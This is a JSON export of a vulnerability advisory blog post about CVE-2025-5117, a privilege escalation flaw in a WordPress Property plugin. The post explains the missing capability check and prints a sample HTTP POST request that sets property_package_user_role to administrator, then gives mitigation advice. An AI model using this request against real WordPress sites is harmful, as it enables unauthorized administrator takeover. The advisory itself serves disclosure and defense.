{"id":47783,"date":"2025-06-02T09:52:16","date_gmt":"2025-06-02T09:52:16","guid":{"rendered":""},"modified":"2025-10-07T14:30:13","modified_gmt":"2025-10-07T20:30:13","slug":"cve-2025-5117-wordpress-property-plugin-privilege-escalation-vulnerability","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-5117-wordpress-property-plugin-privilege-escalation-vulnerability\/","title":{"rendered":"<strong>CVE-2025-5117: WordPress Property Plugin Privilege Escalation Vulnerability<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>The CVE-2025-5117 vulnerability exposes a fundamental flaw in the security mechanism of WordPress&#8217;s Property plugin. It affects versions 1.0.5 to 1.0.6 of the plugin, enabling malicious actors with Author-level access to escalate their privileges to those of an administrator. This vulnerability has the potential to be exploited by attackers to gain unauthorized access to sensitive data or to compromise the system, making it a significant threat to the security of WordPress sites that use the vulnerable versions of the Property plugin.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-5117<br \/>\nSeverity: High &#8211; 8.8 (CVSS Score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: Low (Author-level access)<br \/>\nUser Interaction: Required<br \/>\nImpact: Potential system compromise or data leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p>\n<table><tr><th>Product<\/th><th>Affected Versions<\/th><\/tr><tr><td>WordPress Property Plugin<\/td><td>1.0.5 to 1.0.6<\/td><\/tr><\/table>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The vulnerability resides in the lack of a capability check on the use of the property_package_user_role metadata. This oversight allows authenticated attackers with Author-level access to elevate their privileges to that of an administrator by creating a package post and setting the property_package_user_role to administrator. After doing this, they simply have to submit the PayPal registration form to finalize the privilege escalation.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p>\n<p>Here&#8217;s a conceptual example of how the vulnerability might be exploited:<\/p>\n<pre><code class=\"\" data-line=\"\">POST \/wp-admin\/post-new.php?post_type=property_package HTTP\/1.1\nHost: vulnerable-wp-site.com\nContent-Type: application\/x-www-form-urlencoded\nCookie: wordpress_logged_in=[user_session_cookie]\npost_title=MaliciousPackage&amp;property_package_user_role=administrator&amp;_wpnonce=[valid_wpnonce]<\/code><\/pre>\n<p>This HTTP request creates a new package post with the user role set to &#8220;administrator&#8221;. The attacker would then submit the PayPal registration form to escalate their privileges to an administrator level.<\/p>\n<p><strong>Mitigation Guidance<\/strong><\/p>\n<p>To mitigate the effects of this vulnerability, users are advised to apply the vendor patch for the WordPress Property plugin as soon as possible.<\/p>\n<p>
In the meantime, the use of a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can provide temporary protection against <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2024-7457-macos-authorization-model-exploit-leading-to-potential-mitm-attacks\/\"  data-wpil-monitor-id=\"79995\">potential exploits<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview The CVE-2025-5117 vulnerability exposes a fundamental flaw in the security mechanism of WordPress&#8217;s Property plugin. It specifically targets versions 1.0.5 to 1.0.6 of the plugin, enabling malicious actors with Author-level access to escalate their privileges to those of an administrator. This vulnerability has the potential to be exploited by attackers to gain unauthorized access [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[76],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-47783","post","type-post","status-publish","format-standard","hentry","category-uncategorized","attack_vector-privilege-escalation"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/47783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=47783"}],"version-history":[{"count":9,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/47783\/revisions"}],"predecessor-version":[{"id":82083,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\
/47783\/revisions\/82083"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=47783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=47783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=47783"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=47783"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=47783"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=47783"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=47783"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=47783"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=47783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}